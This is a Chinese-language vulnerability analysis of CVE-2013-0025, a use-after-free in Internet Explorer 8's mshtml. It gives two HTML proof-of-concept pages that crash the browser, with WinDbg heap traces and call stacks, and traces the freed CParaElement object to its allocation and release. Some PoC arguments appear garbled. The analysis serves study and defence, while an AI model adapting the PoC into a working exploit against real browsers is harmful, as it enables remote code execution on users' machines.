CVE-2013-0025
Microsoft IE ‘SLayoutRun’释放后重用漏洞(CNNVD-201302-197)
Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器。
Microsoft Internet Explorer 8中的SLayoutRun中存在释放后重用漏洞。通过特制网站触发对已删除对象的访问,远程攻击者可利用该漏洞执行任意代码。
测试环境
Windows7
IE 8.0.7600.16385
poc代码如下
<!doctype html>
<html>
<head></head>
<body>
<p> </p>
<script>
Math.tan(,);
document.body.style.whiteSpace = "pre-line";
setTimeout("document.body.innerHTML = 'i'",);
</script>
</body>
</html>
:> r
eax=1ca0afb0 ebx=0411e8d8 ecx= edx= esi=1ceaefd8 edi=1ceaefd8
eip= esp=0411e84c ebp=0411e84c iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!ElementWantsNotification+0x5:
f7461c00000008 test dword ptr [esi+1Ch],8000000h ds::1ceaeff4=????????
:> !heap -p -a esi
address 07620fd8 found in
_DPH_HEAP_ROOT @ 1a1000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
75e06e8:
6fcd90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
ntdll!RtlDebugFreeHeap+0x0000002f
77857aca ntdll!RtlpFreeHeap+0x0000005d
77822d68 ntdll!RtlFreeHeap+0x00000142
771af1ac kernel32!HeapFree+0x00000014
6a2a930e mshtml!operator delete[]+0x00000016
6a318c8d mshtml!CParaElement::`vector deleting destructor'+0x0000001f
6a2b7dd0 mshtml!CBase::SubRelease+0x00000022
6a310fdf mshtml!CElement::PrivateExitTree+0x00000011
6a1f5b42 mshtml!CMarkup::SpliceTreeInternal+0x00000083
6a1f6ff9 mshtml!CDoc::CutCopyMove+0x000000ca
6a1f6f39 mshtml!CDoc::Remove+0x00000018
6a1f6f17 mshtml!RemoveWithBreakOnEmpty+0x0000003a
6a1f7aef mshtml!InjectHtmlStream+0x00000191
6a1f793e mshtml!HandleHTMLInjection+0x0000005c
6a1f71fa mshtml!CElement::InjectInternal+0x00000307
6a1f704a mshtml!CElement::InjectCompatBSTR+0x00000046
6a1f988c mshtml!CElement::put_innerHTML+0x00000040
6a3372d6 mshtml!GS_BSTR+0x000001ac
6a32235c mshtml!CBase::ContextInvokeEx+0x000005dc
6a32c75a mshtml!CElement::ContextInvokeEx+0x0000009d
6a32c79a mshtml!CInput::VersionedInvokeEx+0x0000002d
6a2d3104 mshtml!PlainInvokeEx+0x000000eb
6c75a22a jscript!IDispatchExInvokeEx2+0x00000104
6c75a175 jscript!IDispatchExInvokeEx+0x0000006a
6c75a3f6 jscript!InvokeDispatchEx+0x00000098
6c75a4a0 jscript!VAR::InvokeByName+0x00000139
6c76d8c8 jscript!VAR::InvokeDispName+0x0000007d
6c759c0e jscript!CScriptRuntime::Run+0x0000208d
6c765c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
6c765bfb jscript!ScrFncObj::Call+0x0000008d
6c765e11 jscript!CSession::Execute+0x0000015f
重利用:
1:023> r
eax=1ca0afb0 ebx=0411e8d8 ecx=00000000 edx=10001000 esi=1ceaefd8 edi=1ceaefd8
eip=65477386 esp=0411e84c ebp=0411e84c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
65477386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:1ceaeff4=????????
分配:
1:021> g
Breakpoint 2 hit
eax=077e6fd8 ebx=07cfefd0 ecx=7721349f edx=00000000 esi=077e6fd8 edi=07d59f70
eip=6830480f esp=0440f4a4 ebp=0440f4b0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CElement::CElement:
6830480f 8bff mov edi,edi
1:021> dd eax
077e6fd8 00000000 00000000 00000000 00000000
077e6fe8 00000000 00000000 00000000 00000000
077e6ff8 00000000 00000000 ???????? ????????
077e7008 ???????? ???????? ???????? ????????
077e7018 ???????? ???????? ???????? ????????
077e7028 ???????? ???????? ???????? ????????
077e7038 ???????? ???????? ???????? ????????
077e7048 ???????? ???????? ???????? ????????
1:021> kv
ChildEBP RetAddr Args to Child
0440f4a0 68322dbf 0000004d 05832680 0440f4c4 mshtml!CElement::CElement
0440f4b0 68327e98 0000004d 05832680 07cfef08 mshtml!CBlockElement::CBlockElement+0x12
0440f4c4 68304be9 07d59f70 05832680 0440f500 mshtml!CParaElement::CreateElement+0x26
0440f4f0 68308961 0440f524 07a04f30 00000000 mshtml!CreateElement+0x43
0440f51c 68306e93 00000000 071fafb0 07d59f70 mshtml!CHtmParse::ParseBeginTag+0xe3
0440f538 683075c9 7710ef76 071fafb0 071fafb0 mshtml!CHtmParse::ParseToken+0x82
0440f5e0 682f78e8 071fafb0 0af194c6 0af194c6 mshtml!CHtmPost::ProcessTokens+0x237
0440f6a4 682f8a99 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Exec+0x221
0440f6bc 682f89fd 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Run+0x15
0440f6dc 682f7c66 057e4d58 0af194c6 071fafb0 mshtml!PostManExecute+0x1fb
0440f6f8 683113f6 00000001 00000007 0440f718 mshtml!PostManResume+0xf7
0440f708 682f53fc 07d06f98 071fafb0 0440f74c mshtml!CHtmPost::OnDwnChanCallback+0x10
0440f718 683994b2 07d06f98 00000000 057e4d58 mshtml!CDwnChan::OnMethodCall+0x19
0440f74c 683837f7 0440f7e8 00008002 00000000 mshtml!GlobalWndOnMethodCall+0xff
0440f76c 76c686ef 004c0314 00000008 00000000 mshtml!GlobalWndProc+0x10c
0440f798 76c68876 68371de3 004c0314 00008002 USER32!InternalCallWinProc+0x23
0440f810 76c689b5 00000000 68371de3 004c0314 USER32!UserCallWinProcCheckWow+0x14b (FPO: [Non-Fpo])
0440f870 76c68e9c 68371de3 00000000 0440f8f8 USER32!DispatchMessageWorker+0x35e (FPO: [Non-Fpo])
0440f880 6ea704a6 0440f898 00000000 017ecf58 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])
0440f8f8 6ea80446 04fba808 00000000 02f40ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x452 (FPO: [Non-Fpo])
释放:
(68327ec0) mshtml!CParaElement::`vftable' | (68328169) mshtml!CStyleSelector::SetSelectorPart
Exact matches:
mshtml!CParaElement::`vftable' = <no type information>
ChildEBP RetAddr Args to Child
0438eddc 68387db6 0791cf30 00000000 0438ef48 mshtml!CBase::SubRelease (FPO: [0,0,0])
0438edec 683e0fdf 07f2afd8 00000000 682c660e mshtml!CBase::PrivateRelease+0x3c
0438edf8 682c660e 0791cf30 00000000 00000018 mshtml!CElement::PrivateExitTree+0x11 (FPO: [0,0,1])
0438ef48 682c5b42 0438f06c 0438efbc 00000000 mshtml!CSpliceTreeEngine::RemoveSplice+0x841
0438f028 682c6ff9 0438f060 0438f06c 00000000 mshtml!CMarkup::SpliceTreeInternal+0x83
0438f078 682c6f39 0438f220 0438f25c 00000001 mshtml!CDoc::CutCopyMove+0xca
0438f094 682c6f17 0438f220 0438f25c 00000000 mshtml!CDoc::Remove+0x18
0438f0ac 682c7aef 0438f25c 07b70e74 683791b8 mshtml!RemoveWithBreakOnEmpty+0x3a
0438f1a8 682c793e 0438f220 0438f25c 0438f1d0 mshtml!InjectHtmlStream+0x191
0438f1e4 682c71fa 0438f220 0438f25c 00000002 mshtml!HandleHTMLInjection+0x5c
0438f29c 682c704a 00000000 00000001 07b70e74 mshtml!CElement::InjectInternal+0x307
0438f2b8 682c988c 05680fd0 00000000 00000001 mshtml!CElement::InjectCompatBSTR+0x46
0438f2d8 684072d6 00680fd0 07b70e74 07b7ffd0 mshtml!CElement::put_innerHTML+0x40
0438f308 683f235c 05680fd0 07b7ffd0 07039fd8 mshtml!GS_BSTR+0x1ac
0438f37c 683fc75a 05680fd0 80010402 00000002 mshtml!CBase::ContextInvokeEx+0x5dc
0438f3cc 683fc79a 05680fd0 80010402 00000002 mshtml!CElement::ContextInvokeEx+0x9d
0438f3f8 683a3104 05680fd0 80010402 00000002 mshtml!CInput::VersionedInvokeEx+0x2d
0438f44c 6bcfa22a 06b12fd8 80010402 00000002 mshtml!PlainInvokeEx+0xeb
0438f488 6bcfa175 07328d10 80010402 00000409 jscript!IDispatchExInvokeEx2+0x104
0438f4c4 6bcfa3f6 07328d10 00000409 00000004 jscript!IDispatchExInvokeEx+0x6a
(96c.c6c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07912fb0 ebx=0438edb8 ecx=00000000 edx=10001000 esi=07f2afd8 edi=07f2afd8
eip=68387386 esp=0438ed2c ebp=0438ed2c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
68387386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:07f2aff4=????????
尝试对应到js语句中
修改POC
<!doctype html>
<html>
<head></head>
<body>
<p> </p>
<script>
Math.tan(2,3);
document.body.style.whiteSpace = "pre-line";
Math.sin(0);
setTimeout("document.body.innerHTML = 'i'",100);
Math.cos(0);
</script>
</body>
</html>
UAF元素CParaElement是由
<p> </p>
导致创建的
1:020> g
Breakpoint 1 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d8c0 esp=0423ecf4 ebp=0423ed30 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
jscript!tan:
6be7d8c0 ff258010e56b jmp dword ptr [jscript!_imp__tan (6be51080)] ds:0023:6be51080={msvcrt!tan (758dde34)}
1:020> g
Breakpoint 3 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d711 esp=0423ecf4 ebp=0423ed30 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
jscript!sin:
6be7d711 ff256810e56b jmp dword ptr [jscript!_imp__sin (6be51068)] ds:0023:6be51068={msvcrt!sin (758d8aea)}
1:020> g
Breakpoint 2 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d67f esp=0423ecf4 ebp=0423ed30 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
jscript!cos:
6be7d67f ff259010e56b jmp dword ptr [jscript!_imp__cos (6be51090)] ds:0023:6be51090={msvcrt!cos (758d8ace)}
1:020> g
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8 add dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010
1:020> g
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8 add dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010
1:020> g
eax=00000043 ebx=00000000 ecx=0792afd8 edx=00000000 esi=0792afd8 edi=00000000
eip=68387d27 esp=0423e8f8 ebp=0423e904 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8 add dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=0000000a
1:020> g
(6b0.f20): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=079d2fb0 ebx=0423e8d0 ecx=00000000 edx=10001000 esi=0792afd8 edi=0792afd8
eip=68387386 esp=0423e844 ebp=0423e844 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
68387386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:0792aff4=????????
释放可以根据回溯中的CElement::put_innerHTML分析得出是POC的document.body.innerHTML = 'i'所导致
没有明显的js语句对应于重用
漏洞原因分析
这个漏洞的成因在于CTreeNode没有被释放存在有CParaElement对象的悬垂指针,而CTreeNode没有被释放的原因在于被CTreeDataPos对象错误的引用。
CVE-2013-0025的更多相关文章
- 应用安全-软件安全-漏洞CVE整理
jira ssrf CVE-2019-8451 url = url + '/plugins/servlet/gadgets/makeRequest?url=' + host + '@www.baidu ...
- 2013 Asia Changsha Regional Contest---Josephina and RPG(DP)
题目链接 http://acm.hdu.edu.cn/showproblem.php?pid=4800 Problem Description A role-playing game (RPG and ...
- SharePoint 2013: A feature with ID has already been installed in this farm
使用Visual Studio 2013创建一个可视web 部件,当右击项目选择"部署"时报错: "Error occurred in deployment step ' ...
- Visual Studio 2013 添加一般应用程序(.ashx)文件到SharePoint项目
默认,在用vs2013开发SharePoint项目时,vs没有提供一般应用程序(.ashx)的项目模板,本文解决此问题. 以管理员身份启动vs2013,创建一个"SharePoint 201 ...
- SharePoint 2013 create workflow by SharePoint Designer 2013
这篇文章主要基于上一篇http://www.cnblogs.com/qindy/p/6242714.html的基础上,create a sample workflow by SharePoint De ...
- Install and Configure SharePoint 2013 Workflow
这篇文章主要briefly introduce the Install and configure SharePoint 2013 Workflow. Microsoft 推出了新的Workflow ...
- SharePoint 2013 configure and publish infopth
This article will simply descript how to configure and publish a InfoPath step by step. Note: To con ...
- TFS 2013 培训视频
最近给某企业培训了完整的 TFS 2013 系列课程,一共四天. 下面是该课程的内容安排: 项目管理 建立项目 成员的维护 Backlog 定义 任务拆分 迭代 ...
- Visual Studio 2013 Ultimate因为CodeLens功能导致Microsoft.Alm.Shared.Remoting.RemoteContainer.dll高CPU占用率的折中解决方案
1.为什么Microsoft.Alm.Shared.Remoting.RemoteContainer.dll的CPU占用率以及内存使用率会那么高? 在Visual Studio 2013 Ultima ...
- 沙盒解决方案解决SharePoint 2013 以其他身份登陆的问题
众所周知,SharePoint 2013没有像SharePoint 2010那样有一个叫"以其他身份登录"的菜单项. 当然解决方案也很多,比如你可以直接修改Welcome.ascx ...
随机推荐
- 公钥与私钥对HTTPS的理解(数字证书的需要)
本文转自某大牛链接 文中首先解释了加密解密的一些基础知识和概念,然后通过一个加密通信过程的例子说明了加密算法的作用,以及数字证书的出现所起的作用.接着对数字证书做一个详细的解释,并讨论一下window ...
- unity生成Android apk
前提:本文默认你安装了unity5.6版本,不是这个版本的没有Gradle(new)选项,也默认你安装了Android Studio并配置好了环境变量. Gradle(new):打包Android S ...
- Java入门:char与byte的区别
byte 是字节数据类型 ,是有符号型的,占1 个字节:大小范围为-128—127 .char 是字符数据类型 ,是无符号型的,占2字节(Unicode码 ):大小范围 是0—65535 :char是 ...
- Linux操作系统常见安装方式
Linux操作系统常见安装方式 作者:尹正杰 版权声明:原创作品,谢绝转载!否则将追究法律责任. 在window操作系统安装程序只需要点点鼠标就能搞定的事情,但是在Linux操作系统中,尤其是字符终端 ...
- (转) linux下vim和bash配置文件
1.注释版 ~/.vimrc "去掉讨厌的有关vi一致性模式,避免以前版本的一些bug和局限 set nocompatible set autoread " 文件修改之后自动载入 ...
- windows环境下批处理实现守护进程
这个脚本提供两种方式守护,一种是通过进程名,但对于进程名都是java.exe的java程序不适用,另一种是通过netstat查找应用程序所监听的端口是否正在被监听.这两种方式可以在脚本中通过两个冒号注 ...
- 【操作记录】Asp.Net Core 的一些基本操作或属性
用于记录在项目中使用到的方法.属性.操作,持续更新中 .net core 开源地址 图片上传: public async Task<IActionResult> Upload([FromS ...
- Java并发编程原理与实战八:产生线程安全性问题原因(javap字节码分析)
前面我们说到多线程带来的风险,其中一个很重要的就是安全性,因为其重要性因此,放到本章来进行讲解,那么线程安全性问题产生的原因,我们这节将从底层字节码来进行分析. 一.问题引出 先看一段代码 packa ...
- Plot Candlestick Charts in Research of quantopian
ipython_notebook/Plot Candlestick Charts in Research-.ipynb at master · duanqingshan/ipython_noteboo ...
- 程序员 & 设计师都能用上的 75 份速查手册
分享75份开发人员和设计师会用到的速查手册,由 vikas 收集整理,包括:jQuery.HTML.HTML5.CSS.CSS3.JavaScript.Photoshop .git.Linux.Jav ...